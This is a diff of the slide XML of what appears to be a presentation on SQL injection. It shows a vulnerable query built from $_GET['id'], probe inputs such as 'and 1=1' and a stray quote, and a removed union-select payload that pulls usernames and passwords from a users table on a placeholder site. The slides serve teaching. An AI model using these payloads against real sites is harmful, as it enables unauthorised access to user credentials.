-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1001"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1001"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>In CBR for a two-week engagement.</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1001"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>:wq</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -3998,33 +4349,14 @@
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="3" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="4" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -4054,7 +4386,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4243320" y="1849320"/>
-            <a:ext cx="3584880" cy="2833200"/>
+            <a:ext cx="3584520" cy="2832840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4071,7 +4403,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -4146,6 +4480,26 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
+              <a:t>| Finding SQLi             |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
               <a:t>| In-Band SQLi             |</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
@@ -4186,7 +4540,7 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
-              <a:t>| Out of Band SQLi         |</a:t>
+              <a:t>| Mitigation of SQLi       |</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -4206,27 +4560,7 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
-              <a:t>| Mitigation of SQLi.      |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>| Dinner SQLi              |</a:t>
+              <a:t>| Beer SQLi                |</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -4276,33 +4610,14 @@
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="5" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="6" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -4332,7 +4647,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="274320" y="182880"/>
-            <a:ext cx="4571280" cy="364320"/>
+            <a:ext cx="4570920" cy="363960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4349,7 +4664,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -4381,7 +4698,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4937760" y="182880"/>
-            <a:ext cx="2559960" cy="2489040"/>
+            <a:ext cx="2559600" cy="2488680"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4398,7 +4715,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -4411,6 +4730,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>A1</a:t>
             </a:r>
@@ -4429,7 +4749,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="5120640" y="2286000"/>
-            <a:ext cx="4205880" cy="490680"/>
+            <a:ext cx="4205520" cy="490320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4446,7 +4766,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -4459,6 +4781,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Injection</a:t>
             </a:r>
@@ -4477,7 +4800,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4846320" y="3143520"/>
-            <a:ext cx="2285640" cy="330840"/>
+            <a:ext cx="2285280" cy="330480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4494,19 +4817,22 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>www.site.com/?id=1</a:t>
             </a:r>
@@ -4525,7 +4851,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2743200" y="3657600"/>
-            <a:ext cx="7223400" cy="571680"/>
+            <a:ext cx="7223040" cy="571320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4542,19 +4868,22 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>select item, description from products where id = $_GET[‘id’]</a:t>
             </a:r>
@@ -4573,7 +4902,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="5577840" y="4389120"/>
-            <a:ext cx="866160" cy="330840"/>
+            <a:ext cx="865800" cy="330480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4590,19 +4919,22 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>OOPS!!</a:t>
             </a:r>
@@ -4621,7 +4953,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4480560" y="5063760"/>
-            <a:ext cx="3200040" cy="330840"/>
+            <a:ext cx="3199680" cy="330480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4638,32 +4970,41 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" u="sng">
                 <a:solidFill>
-                  <a:srgbClr val="0563c1"/>
+                  <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:uFillTx/>
                 <a:latin typeface="Inconsolata"/>
-                <a:hlinkClick r:id="rId1"/>
-              </a:rPr>
-              <a:t>www.site.com/?id=1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t> and 1=1</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>www.site.com/?</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" u="sng">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:uFillTx/>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>id=1+</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>and+1=1</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -4680,7 +5021,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2743200" y="5577840"/>
-            <a:ext cx="7223400" cy="571680"/>
+            <a:ext cx="7223040" cy="571320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4697,19 +5038,22 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>select item, description from products where id = 1 and 1=1</a:t>
             </a:r>
@@ -4721,33 +5065,14 @@
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="7" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="8" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -4770,14 +5095,54 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="89" name="CustomShape 1"/>
+          <p:cNvPr id="89" name="TextShape 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="182880" y="217440"/>
+            <a:ext cx="1552320" cy="331560"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Finding SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="90" name="CustomShape 2"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="182880" y="182880"/>
-            <a:ext cx="1776600" cy="364320"/>
+            <a:off x="3111120" y="1226880"/>
+            <a:ext cx="6464880" cy="601920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4794,39 +5159,59 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>In-Band SQLi</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="90" name="TextShape 2"/>
-          <p:cNvSpPr txBox="1"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>select product, stockcount from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>products where id = 1 </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="91" name="CustomShape 3"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3017520" y="1097280"/>
-            <a:ext cx="6492240" cy="602280"/>
+            <a:off x="4937760" y="640080"/>
+            <a:ext cx="2925720" cy="419040"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4836,37 +5221,56 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>In-band; where the results are returned in the response</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="91" name="TextShape 3"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Finding SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Injections.</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="92" name="CustomShape 4"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2103120" y="1958040"/>
-            <a:ext cx="8138160" cy="602280"/>
+            <a:off x="3136320" y="3017520"/>
+            <a:ext cx="6464880" cy="601920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4876,37 +5280,66 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1 and union select username, password from users</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="92" name="TextShape 4"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1’</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>select product, stockcount from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>products where id = 1’ </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="93" name="CustomShape 5"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3749040" y="2829240"/>
-            <a:ext cx="4754880" cy="2017080"/>
+            <a:off x="3684960" y="2283120"/>
+            <a:ext cx="5486400" cy="457200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4916,175 +5349,226 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
